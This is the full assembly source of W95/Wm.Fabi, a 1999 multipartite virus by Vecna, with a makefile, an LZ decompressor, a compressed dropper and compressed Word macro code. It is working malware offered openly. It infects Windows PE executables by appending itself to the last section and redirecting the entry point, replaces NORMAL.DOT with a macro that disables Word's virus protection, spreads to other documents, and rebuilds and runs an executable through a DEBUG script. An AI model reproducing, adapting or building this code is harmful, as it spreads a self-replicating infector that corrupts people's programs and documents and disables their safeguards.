;W95/Wm.Fabi
;(c) Vecna 1999
;
;I am very proud to introduce the first PE and WinWord Documents multipartite,
;and also the first multipartite to infect WinWord 8.0 documents. Other file/
;document virus exists, but they all only infect WinWord 6/7 format, either VXD
;drivers(as Navrhar or Wogob) or standart DOS EXE/COM files(Anarchy). The virus
;is very simple, and only done to present the technic used to the public.
;
;When executed, the virus check if running under w9x, and exit if not. Then it
;scan KERNEL32 memory image and get the VxDCall0 address, that is used, in the
;form of int21 calls, to make all things needed for the spreading.
;
;The virus search for files to infect in current directory, then windows and
;system directory. The infection process is classical: the last section is
;increase, and the virus change the entrypoint to point to it. Then it run his
;macro infection routine.
;
;The virus, to infect WinWord, create a dropper, infect it, and create a debug
;script of it. This debug script is then added to the macro code, that have
;the function to spread to another documents and drop and execute such dropper.
;The VisualBasic code is then written to disk, and a new NORMAL.DOT, with
;some code to load the virus VisualBasic source is created in place of the real
;one(PE->DOC done).
;
;When WinWord start, our patched NORMAL.DOT, using AutoExec, load the virus,
;that, using AutoClose, infect new documents closed, and create and run our
;virus dropper(DOC->PE done).
;
;The NORMAL.DOT, the virus dropper, and part of the macro code are compressed
;using a LZ scheme, and only unpacked when needed. Altought this, the virus is
;very big, 15930 bytes.
;
;Greetz go: All 29A crew, Z0MBiE, Super, Virogen, Techno and Reptile, the guy
;           that discovered this way to cross-infect...
;

.386p
.model flat
locals
.data
dd ?

.code

ofs   equ offset
by    equ byte ptr
wo    equ word ptr
dwo   equ dword ptr
K32   equ 0BFF70000h

;DEBUG equ 1                                   ;release version!

extrn ExitProcess:proc
extrn MessageBoxA:proc

start:
       cmp by [esp+3], 0bfh
       push ofs stub
  old_eip equ dwo $-4
       je @@1                                  ;if not under w9x, exit
       ret

       db '(c) Vecna', 13, 10
       db 'Parecia inofensiva mas te dominou...', 13, 10

vxdcall dd 0                                   ;VxDCall0 in KERNEL32

  @@1:
       call @@2
  @@2:
       pop ebp
       sub ebp, ofs @@2
       call vinit                              ;get VxDCall0
       mov ah, 1ah
       lea edx, [ebp+ofs DTA]
       call int21                              ;Set DTA for file search
       sub edx, edx
       lea esi, [ebp+ofs actualdir+1]
       mov by [esi-1], '\'
       mov ah, 47h
       call int21                              ;save current directory
       call InfectDir                          ;infect current directory
       mov ah, 3bh
       call @@3
       db '\WINDOWS', 0
  @@3:
       pop edx
       call int21
       call InfectDir                          ;infect /WINDOWS directory
       mov ah, 3bh
       call @@4
       db '\WINDOWS\SYSTEM', 0
  @@4:
       pop edx
       call int21
       call InfectDir                          ;infect /WINDOWS/SYSTEM dir
       mov ah, 3bh
       lea edx, [ebp+ofs actualdir]
       call int21                              ;return to current directory
       call macro_fun                          ;infect WinWord loading process
       ret

;simulate int21 calls under win9x
int21:
       call @@1
  @@1:
       pop ebp
       sub ebp, ofs @@1                        ;get delta offset
       push ecx
       push eax
       push 002A0010h
       call [ebp+ofs vxdcall]                  ;call emulated pmode int21
       ret

;get address of VxDCall0 in KERNEL32 memory image
vinit:
       call @@0
       mov esp, [esp+8]                        ;on fault: restore stack
       jmp @@1
  @@0:
       sub ecx, ecx
       push dwo fs:[ecx]
       mov fs:[ecx], esp                       ;set SEH
       cmp dwo ds:[K32+80h], 'EP'
       jnz @@1
       mov esi, ds:[K32+80h+78h]               ;get export directory
       add esi, K32+1ch
       mov eax, [esi]                          ;get export table
       mov ebx, [eax+K32]                      ;get export 0 (VxDCall0)
       add ebx, K32
       mov [ebp+ofs vxdcall], ebx              ;store VxDCall0
       clc
       db 0b8h                                 ;mov eax, ? (skip STC code)
  @@1:
       stc                                     ;signal error
       db 3 dup(90h)
       pop dwo fs:[0]                          ;remove SEH
       pop ecx
       ret

;scan directory entries for files to infect
InfectDir:
       mov ah, 4eh
       call @@0
IFDEF DEBUG
       db 'GOAT*.EXE', 0
ELSE
       db '*.EXE', 0
ENDIF
  @@0:
       pop edx
       mov ecx, 27                             ;file attributes to look for
  @@1:
       call int21
       jc @@2
       lea edx, [ebp+ofs DTA+1eh]
       call Infect                             ;infect file found
       mov ah, 4fh
       jmp @@1                                 ;find more files!
  @@2:
       ret

;infect pe files using the traditional last section size increase technics
Infect:
       call @@set_seh
       mov esp, [esp+8]                        ;on fault: restore stack
       jmp @@fault
  @@set_seh:
       sub ecx, ecx
       push dwo fs:[ecx]
       mov fs:[ecx], esp                       ;set SEH
       mov ax, 4300h
       call int21
       jc @@fault                              ;problem getting attributes?
       push edx
       push ecx
       mov ax, 4301h
       sub ecx, ecx
       call int21
       jc @@1                                  ;cant clean they... :(
       mov ax, 3d02h
       call int21
       mov ebx, eax
       jc @@1
       mov ah, 3fh
       mov ecx, 1024                           ;open file & read 1kb from top
       lea edx, [ebp+header]
       mov esi, edx
       call int21
       jc @@2
       xor eax, ecx
       jnz @@2
       cmp wo [esi], 'ZM'
       jne @@2
       mov eax, dwo [esi+3ch]
       add esi, eax
       cmp eax, 900
       jnb @@2                                 ;still reading in our buffer?
       cmp dwo [esi], 'EP'
       jne @@2
       mov eax, 'IBAF'
       cmp dwo [esi+88], eax
       mov dwo [esi+88], eax
       je @@2                                  ;EXE file, PE file and clean?
       cmp wo [esi+4], 014Ch                   ;i386?
       jne @@2
       movzx eax, wo [esi+22]
       not al
       test eax, 2002h
       jnz @@2                                 ;DLL, or non executable file?
       movzx eax, wo [esi+6]
       dec eax
       imul eax, eax, 40
       lea edi, [esi+0e0h+24]
       add edi, eax                            ;get last section header
       mov edx, [edi+16]
       push edx
       add edx, [edi+12]
       xchg edx, [esi+40]
       mov [ebp+ofs old_eip], edx              ;set new and save old entry
       pop edx
       add edx, [edi+20]
       mov dwo [edi+36], 0c0000040h
       add dwo [edi+8], ofs vvend-ofs start    ;increase section and set our
       add dwo [edi+16], ofs vend-ofs start    ;kewl attributes (IRW)
       mov eax, [esi+52]
       add [ebp+ofs old_eip], eax              ;add peh_imagebase to return eip
       mov eax, [edi+8]
       add eax, [edi+12]
       mov [esi+80], eax                       ;update pe_imagesize
       mov ax, 4200h
       sub ecx, ecx
       call int21
       mov ah, 40h
       lea edx, [ebp+ofs start]
       mov ecx, ofs vend-ofs start
       call int21                              ;write virus to end of file
       mov ax, 4200h
       sub ecx, ecx
       cdq
       call int21                              ;rewind to start of file
       mov ah, 40h
       lea edx, [ebp+ofs header]
       mov ecx, 1024
       call int21                              ;write modificated header
  @@2:
       mov ah, 3eh
       call int21
  @@1:
       pop ecx
       pop edx
       mov ax, 4301h
       call int21                              ;cloae and restore attributes
  @@fault:
       pop dwo fs:[0]                          ;remove SEH
       pop ecx
       ret

include 1.inc

include 2.inc

macro_fun:
       mov ah, 5bh
       call @@1
 fname db 'C:\FABI.SYS', 0
  @@1:
       pop edx
       push 2
       pop ecx
       call int21                              ;create new file int21 call
       jc @@0                                  ;if FABI.SYS exists, exit...
       push eax
       lea eax, [ebp+ofs dropper]
       push eax
       push dropper_size
       lea eax, [ebp+ofs vend+4]
       push eax
       sub eax, 4
       push eax
       call lzrw1_decompress                   ;unpack dropper code
       pop ebx
       mov ah, 40h
       lea esi, [ebp+ofs vend]
       mov ecx, [esi]
       lea edx, [esi+4]
       call int21                              ;and write it to disk
       mov ah, 3eh
       call int21
       lea edx, [ebp+ofs fname]
       call Infect                             ;now infect this dropper
       call @@2
       db 'C:\FABI.SRC', 0
  @@2:
       pop edx
       mov ax, 3c00h
       push 2
       pop ecx
       call int21                              ;create our VisualBasic code now
       jc @@0
       push eax
       lea eax, [ebp+ofs macrocode]
       push eax
       push macro_size
       lea eax, [ebp+ofs vend+4]
       push eax
       sub eax, 4
       push eax
       call lzrw1_decompress
       pop ebx
       mov ah, 40h
       lea esi, [ebp+ofs vend]
       mov ecx, [esi]
       lea edx, [esi+4]
       call int21                              ;unpack and write it to disk
       push ebx                                ;save handle of our vb code file
       mov ax, 3d00h
       lea edx, [ebp+ofs fname]
       call int21
       mov ebx, eax
       mov eax, 4202h
       sub ecx, ecx
       cdq
       call int21
       push eax                                ;get & save dropper size
       mov eax, 4200h
       sub ecx, ecx
       cdq
       call int21
       mov ecx, [esp]
       mov ah, 3fh
       lea esi, [ebp+ofs vend]
       mov edx, esi
       call int21                              ;and read it as a whole to mem
       mov ah, 3eh
       call int21                              close dropper
       pop ecx
       lea edi, [esi+ecx]
       push edi
       call script                             ;create debug script for dropper
       pop edx
       sub edi, edx
       xchg ecx, edi
       pop ebx
       mov ah, 40h                             ;write script
       call int21
       call @@3
  @@4:
       db 'SHELL "C:\FABI.BAT", VBHIDE', 13, 10
       db 'KILL "C:\FABI.BAT"', 13, 10
       db 'END SUB'
       db 13, 10
  @@3:
       pop edx
       mov ecx, ofs @@3-ofs @@4
       mov ah, 40h
       call int21
       mov ah, 3eh
       call int21                              ;write last part & close vb file
       mov ecx, 9
  @@44:
       push ecx
       lea eax, [ecx+'0']                      ;transform to ASCII number
       mov by [ebp+ofs p1], al
       mov by [ebp+ofs p2], al
       mov by [ebp+ofs p3], al                 ;and update file paths
       lea edx, [ebp+file1]
       call CheckAttr                          ;portuguese directory
       jnc @@5
       lea edx, [ebp+file2]
       call CheckAttr                          ;spanish directory
       jnc @@5
       lea edx, [ebp+file3]
       call CheckAttr                          ;english directory
       jnc @@5
       pop ecx
       loop @@44                               ;try another combination...
       jmp @@0
  @@5:
       add esp, 4                              ;templates path found!
       mov eax, 4301h
       sub ecx, ecx
       call int21
       jc @@0
       mov ah, 41h
       call int21                              ;remove original NORMAL.DOT
       jc @@0
       push edx
       lea eax, [ebp+ofs normaldot]
       push eax
       push normaldot_size
       lea eax, [ebp+ofs vend+4]
       push eax
       sub eax, 4
       push eax
       call lzrw1_decompress                   ;unpack our NORMAL.DOT
       pop edx
       mov eax, 3c00h
       sub ecx, ecx
       call int21
       jc @@0
       xchg eax, ebx
       mov ah, 40h
       lea esi, [ebp+ofs vend]
       mov ecx, [esi]
       lea edx, [esi+4]
       call int21                              ;and write it to disk
       mov ah, 3eh
       call int21
  @@0:
       ret                                     ;all done...

file1  db 'C:\ARQUIV~1/MICROS~'
p1     db '1'
       db '/MODELOS/NORMAL.DOT', 0

file2  db 'C:\ARCHIV~1/MICROS~'
p2     db '1'
       db '/MODELOS/NORMAL.DOT', 0


file3  db 'C:\PROGRA~1/MICROS~'
p3     db '1'
       db '/TEMPLA~1/NORMAL.DOT', 0

include 3.inc

update_address:
       push eax ecx
       db 0b8h
addr   dd 0                                    ;get address to eax
       mov ecx, 4
  @@1:
       rol ax, 4
       call mhex                               ;print hex digits
       loop @@1
       add dwo [ebp+ofs addr], 10h             ;update address
       pop ecx eax
       ret

mhex:
       push eax ebx
       and eax, 01111b                         ;lower nibble
       call $+21
       db '0123456789ABCDEF'
       pop ebx
       xlat                                    ;turn it in hex digit
       stosb
       pop ebx eax
       ret

copy_line:
       push eax
  @@0:
       lodsb
       or al, al
       jz @@1                                  ;zero found, stop copy
       stosb
       jmp @@0
  @@1:
       pop eax
       ret

make_hex:
       push eax ecx esi
       db 0b8h+6
iaddr  dd 0                                    ;esi -> actual buffer position
       inc dwo [ebp+ofs iaddr]     ;set next
       mov al, 20h
       stosb                                   ;print space
       lodsb
       rol al, 4
       call mhex                               ;print upper nibble
       rol al, 4
       call mhex                               ;print lower nibble
       pop esi ecx eax
       loop make_hex
       ret

script:
       cld
       mov dwo [ebp+ofs addr], 0100h
       mov [ebp+ofs iaddr], esi    ;set vars
       lea esi, [ebp+ofs intro]
       call copy_line                          ;copy intro code
       mov eax, 16
       cdq
       xchg eax, ecx
       div ecx                                 ;ecx=number of 16-bytes lines
       mov ecx, eax                            ;edx=remainder for last line
  @@0:
       push ecx
       lea esi, [ebp+ofs outcmd]
       call copy_line                          ;print
       call update_address                     ;address
       mov ecx, 16
       call make_hex                           ;code to assemble
       mov eax, 000A0D00h+'"'
       stosd                                   ;next line
       dec edi
       pop ecx
       loop @@0
       mov ecx, edx
       jecxz @@1                               ;no remainder?
       lea esi, [ebp+ofs outcmd]
       call copy_line
       call update_address                     ;make last line
       call make_hex
       mov eax, 000A0D00h+'"'
       stosd
       dec edi
       sub wo [ebp+ofs addr], 10h              ;undo damage from above call...
  @@1:
       lea esi, [ebp+ofs ssize]
       call copy_line                          ;RCX
       add wo [ebp+ofs addr], dx
       sub wo [ebp+ofs addr], 100h
       lea esi, [ebp+ofs ssize]
       call copy_line                          ;optimization!
       sub edi, 6
       call update_address                     ;set size
       mov eax, 000A0D00h+'"'
       stosd
       dec edi
       lea esi, [ebp+ofs coda]                 ;copy final shit
       call copy_line
       ret

dbgscript dd 0

dbgscript_size dd 0

intro    db 'OPEN "C:\FABI.DRV" FOR OUTPUT AS 1', 13, 10
         db 'PRINT #1, "N C:\FABI.EX"',13,10,0

outcmd   db 'PRINT #1, "E ',0

ssize    db 'PRINT #1, "RCX"', 13, 10, 0

coda     db 'PRINT #1, "W"', 13, 10
         db 'PRINT #1, "Q"', 13, 10
         db 'PRINT #1, ""', 13, 10
         db 'CLOSE #1', 13, 10, 0

CheckAttr:
       mov eax, 4300h
       call int21
       ret

include 4.inc

vend equ this byte                             ;virus end

actualdir db 255 dup (0)

header db 1024 dup (0)

DTA    db 50 dup (0)

      db 128*1024 dup (0)

vvend equ this byte                            ;virus virtual end

stub:
       push 0
       call @@1
       db '(c) Vecna', 0
  @@1:
       call @@2
       db 'First Generation', 0
  @@2:
       push 0
       call MessageBoxA
       push 0
       call ExitProcess

end    start

;-------------------------------(CUT HERE)-----------------------------------

#MAKEFILE for W95/Wm.Fabi

w95fabi.exe : w95fabi.obj
	tlink32 w95fabi,,,import32.lib
	pewrsec w95fabi.exe

w95fabi.obj : w95fabi.asm 1.inc 2.inc 3.inc 4.inc
	tasm /m /ml /l w95fabi.asm

;-------------------------------(CUT HERE)-----------------------------------

;LZ decompression routines
;(c) Vecna 1999

;void fast_copy(p_src,p_dst,len)
;
fast_copy proc
       push edi esi ecx
       mov ecx,dword ptr [esp+ 4+(4*3)]
       mov edi,dword ptr [esp+ 8+(4*3)]
       mov esi,dword ptr [esp+12+(4*3)]
       cld
       rep movsb
       pop ecx esi edi
       ret 12
fast_copy endp


lzrw1_decompress proc	near
?live1@768:
   ;
   ;	void lzrw1_decompress(p_src_first,src_len,p_dst_first,p_dst_len)
   ;	
@27:
;	push      ebp
;	mov       ebp,esp
;	add       esp,-8
        enter 8,0
	push      ebx
	push      esi
	push      edi
   ;	
   ;	/* Input  : Specify input block using p_src_first and src_len.          */
   ;	/* Input  : Point p_dst_first to the start of the output zone.          */
   ;	/* Input  : Point p_dst_len to a ULONG to receive the output length.    */
   ;	/* Input  : Input block and output zone must not overlap. User knows    */
   ;	/* Input  : upperbound on output block length from earlier compression. */
   ;	/* Input  : In any case, maximum expansion possible is eight times.     */
   ;	/* Output : Length of output block written to *p_dst_len.               */
   ;	/* Output : Output block in Mem[p_dst_first..p_dst_first+*p_dst_len-1]. */
   ;	/* Output : Writes only  in Mem[p_dst_first..p_dst_first+*p_dst_len-1]. */
   ;	UBYTE *p_src_first, *p_dst_first; ULONG src_len, *p_dst_len;
   ;	{UWORD controlbits=0, control;
   ;	
?live1@784: ; EDI = control, ECX = p_src_first
	xor       esi,esi
?live1@800: ; 
	mov       ecx,dword ptr [ebp+20]
   ;	
   ;	 UBYTE *p_src=p_src_first+FLAG_BYTES, *p_dst=p_dst_first,
   ;	       *p_src_post=p_src_first+src_len;
   ;	
?live1@816: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first
	;	
	mov       ebx,dword ptr [ebp+16]
	add       ebx,ecx
?live1@832: ; EDI = control, ESI = controlbits, ECX = p_src_first
	mov       edx,dword ptr [ebp+12]
?live1@848: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first
	;	
	mov       dword ptr [ebp-4],ebx
?live1@864: ; EDI = control, ESI = controlbits, ECX = p_src_first
	lea       eax,dword ptr [ecx+4]
   ;	
   ;	 if (*p_src_first==FLAG_COPY)
   ;	
?live1@880: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first
	;	
	cmp       byte ptr [ecx],1
	jne       short @28
   ;	
   ;	   {fast_copy(p_src_first+FLAG_BYTES,p_dst_first,src_len-FLAG_BYTES);
   ;	
?live1@896: ; ECX = p_src_first
	add       ecx,4
	push      ecx
	mov       eax,dword ptr [ebp+12]
	push      eax
	mov       edi,dword ptr [ebp+16]
	sub       edi,4
	push      edi
	call      fast_copy
   ;	
   ;	    *p_dst_len=src_len-FLAG_BYTES; return;}
   ;	
?live1@912: ; EDI = @temp14
	mov       eax,dword ptr [ebp+8]
	mov       dword ptr [eax],edi
	jmp       short @29
   ;	
   ;	 while (p_src!=p_src_post)
   ;	
?live1@928: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
@28:
	cmp       eax,dword ptr [ebp-4]
	je        short @31
   ;	
   ;	   {if (controlbits==0)
   ;	
@30:
	test      esi,esi
	jne       short @32
   ;	
   ;	      {control=*p_src++; control|=(*p_src++)<<8; controlbits=16;}
   ;	
?live1@960: ; EAX = p_src, EDX = p_dst
	movzx     edi,byte ptr [eax]
	inc       eax
	xor       ecx,ecx
;	mov       esi,16
        push 16
        pop esi
	mov       cl,byte ptr [eax]
	shl       ecx,8
	or        edi,ecx
	inc       eax
   ;	
   ;	    if (control&1)
   ;	
?live1@976: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
@32:
;	test      edi,1
;	je        short @33
        bt edi, 0
	jnc        short @33
   ;
   ;	      {UWORD offset,len; UBYTE *p;
   ;	       offset=(*p_src&0xF0)<<4; len=1+(*p_src++&0xF);
   ;	
@34:
	xor       ebx,ebx
	xor       ecx,ecx
	mov       bl,byte ptr [eax]
	mov       cl,byte ptr [eax]
	and       ebx,15
	inc       eax
	inc       ebx
	and       ecx,240
	mov       dword ptr [ebp-8],ebx
   ;	
   ;	       offset+=*p_src++&0xFF; p=p_dst-offset;
   ;	
?live1@1008: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = offset
	;	
	xor       ebx,ebx
	mov       bl,byte ptr [eax]
	inc       eax
?live1@1024: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
	shl       ecx,4
?live1@1040: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = offset
	;	
	and       ebx,255
	add       ecx,ebx
	mov       ebx,edx
	sub       ebx,ecx
	mov       ecx,ebx
	jmp       short @36
   ;	
   ;	       while (len--) *p_dst++=*p++;}
   ;	
?live1@1056: ; EAX = p_src, EDX = p_dst, ECX = p, EDI = control, ESI = controlbits
	;	
@35:
	mov       bl,byte ptr [ecx]
	inc       ecx
	mov       byte ptr [edx],bl
	inc       edx
@36:
	mov       ebx,dword ptr [ebp-8]
	add       dword ptr [ebp-8],-1
	test      ebx,ebx
	jne       short @35
@37:
	jmp       short @38
   ;	
   ;	    else
   ;	       *p_dst++=*p_src++;
   ;	
?live1@1072: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
@33:
	mov       cl,byte ptr [eax]
	inc       eax
	mov       byte ptr [edx],cl
	inc       edx
   ;	
   ;	    control>>=1; controlbits--;
   ;	
@38:
	shr       edi,1
	dec       esi
	cmp       eax,dword ptr [ebp-4]
	jne       short @30
   ;	
   ;	   }
   ;	 *p_dst_len=p_dst-p_dst_first;
   ;	
?live1@1120: ; EDX = p_dst
@31:
	sub       edx,dword ptr [ebp+12]
	mov       eax,dword ptr [ebp+8]
	mov       dword ptr [eax],edx
   ;	
   ;	}
   ;
?live1@1136: ; 
@39:
@29:
	pop       edi
	pop       esi
	pop       ebx
	pop       ecx
	pop       ecx
	pop       ebp
	ret       16
lzrw1_decompress	endp

;-------------------------------(CUT HERE)-----------------------------------

;LZ compressed PE dropper (A EXE that just call to ExitProcess)
;(c) Vecna 1999

dropper_size equ 856
dropper  equ this byte
DB 000H,000H,000H,000H,000H,000H,04DH,05AH,050H,000H,002H,000H,000H,000H
DB 004H,000H,00FH,000H,0FFH,0FFH,000H,000H,0C6H,001H,0B8H,002H,00CH,003H,003H
DB 040H,000H,01AH,003H,007H,00FH,004H,00DH,010H,001H,000H,000H,0BAH,010H,000H
DB 00EH,000H,000H,01FH,0B4H,009H,0CDH,021H,0B8H,001H,04CH,0CDH,021H,090H,090H
DB 054H,068H,069H,073H,000H,000H,020H,070H,072H,06FH,067H,072H,061H,06DH,020H
DB 06DH,075H,073H,074H,020H,062H,065H,000H,000H,020H,072H,075H,06EH,020H,075H
DB 06EH,064H,065H,072H,020H,057H,069H,06EH,033H,032H,0F0H,01FH,00DH,00AH,024H
DB 037H,00DH,049H,00FH,00EH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,009H,010H,050H,045H,000H,000H,002H,000H,04CH,001H,004H,000H,06DH
DB 026H,0E9H,0A6H,007H,016H,0E0H,000H,08EH,081H,00BH,001H,0D4H,0C2H,002H,019H
DB 014H,019H,006H,006H,016H,010H,002H,008H,003H,004H,020H,002H,008H,000H,040H
DB 000H,000H,003H,00CH,012H,039H,0C6H,0DAH,001H,003H,00FH,002H,004H,003H,000H
DB 00AH,002H,006H,002H,003H,050H,002H,004H,004H,002H,004H,002H,003H,003H,002H
DB 004H,004H,029H,03FH,0F0H,004H,034H,002H,031H,002H,003H,003H,013H,006H,007H
DB 003H,00BH,000H,000H,030H,000H,000H,054H,005H,00AH,00FH,006H,005H,010H,002H
DB 06BH,07EH,07CH,00CH,005H,00AH,00FH,006H,00FH,010H,00FH,010H,00FH,010H,00CH
DB 010H,043H,04FH,044H,002H,0FAH,002H,013H,003H,08DH,003H,004H,002H,0CCH,000H
DB 00FH,0BAH,007H,0ECH,002H,017H,003H,003H,002H,0B7H,060H,044H,041H,054H,041H
DB 003H,00CH,000H,003H,024H,002H,011H,014H,014H,008H,004H,012H,003H,0FEH,008H
DB 005H,002H,0A3H,0C0H,02EH,069H,064H,061H,074H,061H,002H,013H,003H,028H,002H
DB 0D4H,004H,028H,016H,013H,002H,016H,004H,003H,0C1H,0FFH,004H,028H,072H,065H
DB 06CH,06FH,063H,002H,00FH,003H,028H,002H,011H,004H,028H,00EH,0E1H,002H,017H
DB 013H,046H,002H,025H,00FH,003H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,0C2H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 000H,000H,06AH,000H,0E8H,003H,015H,0FFH,025H,030H,030H,032H,077H,003H,00BH
DB 0FFH,0FFH,00FH,004H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,07FH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00DH,010H,028H
DB 0EBH,006H,073H,0ACH,006H,013H,038H,002H,00CH,030H,002H,004H,006H,00FH,00CH
DB 007H,046H,006H,018H,007H,008H,04BH,045H,052H,04EH,045H,080H,000H,04CH,033H
DB 032H,02EH,064H,06CH,06CH,003H,029H,045H,078H,069H,074H,050H,072H,06FH,063H
DB 0F8H,0FFH,065H,073H,073H,003H,00FH,00FH,004H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,009H,010H,092H,088H,0FDH,0FFH,093H,07FH,009H,016H,0E0H,009H,019H,00FH
DB 00AH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,003H,000H,00FH,010H,00FH,010H,000H,000H,000H,000H
DB 000H,000H

;-------------------------------(CUT HERE)-----------------------------------

;LZ compressed macro code
;(c) Vecna 1999

; 'FABI
; SUB AutoClose()
; ON ERROR RESUME NEXT
; OPTIONS.VIRUSPROTECTION = FALSE
; OPTIONS.CONFIRMCONVERSIONS = FALSE
; OPTIONS.SAVENORMALPROMPT = FALSE
; J=1
; K=1
; FOR I = 1 TO NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS.COUNT
; IF NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(I).CODEMODULE.LINES(1,1) = "'FABI" THEN J=I
; NEXT I
; FOR I = 1 TO ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS.COUNT
; IF ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(I).CODEMODULE.LINES(1,1) = "'FABI" THEN K=I
; NEXT I
; SET NT = NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(J).CODEMODULE
; SET AT = ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(K).CODEMODULE
; IF NT.LINES(1, 1) <> "'FABI" THEN
; NT.DELETELINES 1, NT.COUNTOFLINES
; NT.INSERTLINES 1, AT.LINES(1, AT.COUNTOFLINES)
; END IF
; IF AT.LINES(1, 1) <> "'FABI" THEN
; AT.DELETELINES 1, AT.COUNTOFLINES
; AT.INSERTLINES 1, NT.LINES(1, NT.COUNTOFLINES)
; END IF
; OPEN "C:\FABI.BAT" FOR OUTPUT AS 1
; PRINT #1,"@DEBUG <C:\FABI.DRV >NUL"
; PRINT #1,"@COPY C:\FABI.EX C:\FABI.EXE"
; PRINT #1,"@C:\FABI.EXE"
; PRINT #1,"@DEL C:\FABI.EX >NUL"
; PRINT #1,"@DEL C:\FABI.EXE >NUL"
; PRINT #1,"@DEL C:\FABI.DRV >NUL"
; CLOSE #1

macro_size	EQU 559		; size in bytes
macrocode equ this byte
DB 000H,000H,000H,000H,000H,000H,027H,046H,041H,042H,049H,00DH,00AH,053H
DB 055H,042H,020H,041H,075H,074H,06FH,043H,000H,000H,06CH,06FH,073H,065H,028H
DB 029H,00DH,00AH,04FH,04EH,020H,045H,052H,052H,04FH,052H,000H,010H,020H,052H
DB 045H,053H,055H,04DH,045H,020H,04EH,045H,058H,054H,002H,016H,050H,054H,049H
DB 000H,080H,04FH,04EH,053H,02EH,056H,049H,052H,055H,053H,050H,052H,04FH,054H
DB 045H,043H,003H,011H,000H,001H,020H,03DH,020H,046H,041H,04CH,053H,045H,009H
DB 021H,043H,04FH,04EH,046H,049H,052H,04DH,061H,000H,002H,007H,056H,045H,052H
DB 053H,003H,034H,00FH,024H,053H,02EH,053H,041H,056H,045H,04EH,04FH,052H,088H
DB 040H,04DH,041H,04CH,002H,04AH,04DH,050H,054H,009H,022H,04AH,03DH,031H,00DH
DB 00AH,04BH,003H,005H,046H,005H,001H,002H,082H,049H,002H,019H,031H,020H,054H
DB 04FH,020H,005H,02DH,054H,045H,04DH,050H,04CH,041H,054H,0D0H,000H,045H,02EH
DB 056H,042H,002H,038H,04AH,002H,082H,002H,00AH,043H,04FH,04DH,050H,04FH,04EH
DB 045H,04EH,080H,01CH,054H,053H,02EH,043H,04FH,055H,04EH,002H,0ABH,049H,046H
DB 00FH,030H,00FH,030H,005H,030H,028H,049H,029H,001H,000H,002H,033H,044H,045H
DB 04DH,04FH,044H,055H,04CH,045H,02EH,04CH,049H,04EH,045H,053H,028H,050H,000H
DB 031H,02CH,031H,029H,002H,076H,022H,014H,01EH,022H,020H,054H,048H,045H,04EH
DB 020H,04AH,03DH,05BH,090H,012H,028H,013H,007H,020H,002H,008H,00CH,098H,041H
